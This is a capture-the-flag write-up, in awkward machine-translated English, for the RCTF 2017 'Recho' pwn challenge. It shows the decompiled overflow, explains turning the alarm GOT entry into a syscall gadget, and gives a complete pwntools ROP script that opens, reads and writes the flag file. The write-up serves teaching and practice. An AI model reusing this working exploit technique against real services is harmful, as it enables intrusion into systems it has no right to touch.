[BMZCTF-pwn] 18-RCTF-2017-Recho

Reappear , No, I can't .

The code is simple , The overflow is obvious .

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char nptr[16]; // [rsp+0h] [rbp-40h] BYREF
  char buf[40]; // [rsp+10h] [rbp-30h] BYREF
  int v6; // [rsp+38h] [rbp-8h]
  int v7; // [rsp+3Ch] [rbp-4h]

  Init(argc, argv, envp);
  write(1, "Welcome to Recho server!\n", 0x19uLL);
  while ( read(0, nptr, 0x10uLL) > 0 )
  {
    v7 = atoi(nptr);  // Read in length 
    if ( v7 <= 15 )
      v7 = 16;
    v6 = read(0, buf, v7);  // Read data by length 
    buf[v6] = 0;
    printf("%s", buf);
  }
  return 0;
}

The problem is that there is no exit , Here read(0,nptr,0x10) Sometimes p.shutdown() close ,read Returns the -1, At the same time, this time is no longer controllable . all rop Must be put in advance .

Another question , If you use orw If so, there is no open function , Need to pass a no longer used got Change the table to syscall;ret here alarm This function is very short, just two sentences ：mov rax,0x25;syscall;, stay +5 The position of is syscall 了 , Where to give got[alarm] Add 5

stay 0x40070d A piece of hidden code , It is said that hiding is actually in front of jmp The following code will never be executed , then ida It won't show him . here 3 Bytes are 00 07 c3 Decompiled back is mov byte ptr [rdi],al; So you can give got Add 5 become syscall 了

Then find the file name string , If input is actually a little troublesome , But this string in the title is directly given .

complete exp：

from pwn import *

local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('106.75.101.133', 10024) 

libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug') #

pop_rax = 0x00000000004006fc # pop rax ; ret
pop_rdi = 0x00000000004008a3 # pop rdi ; ret
pop_rdx = 0x00000000004006fe # pop rdx ; ret
pop_rsi = 0x00000000004008a1 # pop rsi ; pop r15 ; ret
'''
#got.alarm -> syscall
.text:00000000000CC200 ; __unwind {
.text:00000000000CC200                 mov     eax, 25h ; '%'
.text:00000000000CC205                 syscall                 ; LINUX - sys_alarm
'''
add_rdi_al = 0x000000000040070d # add byte ptr [rdi], al ; ret   # b'\x00\x07\xc3'

#padding
payload = b'A'*(0x30+8) 
#got.alarm -> syscall
payload += flat(pop_rdi, elf.got['alarm'], pop_rax, 5, add_rdi_al)
#open('flag',0) 
payload += flat(pop_rdi, next(elf.search(b'flag')), pop_rsi,0,0, pop_rdx,0, pop_rax,2, elf.plt['alarm'])
#read(3, bss()+0x100, 0x40)
payload += flat(pop_rdi,3, pop_rsi, elf.bss()+0x100,0, pop_rdx,0x40, elf.plt['read'])
#write(1, bss()+0x100, 0x40)
payload += flat(pop_rdi,1, pop_rsi, elf.bss()+0x100,0, pop_rdx,0x40, elf.plt['write'])

p.sendlineafter(b"Welcome to Recho server!\n", str(len(payload)).encode())
p.send(payload)
p.shutdown()

p.interactive()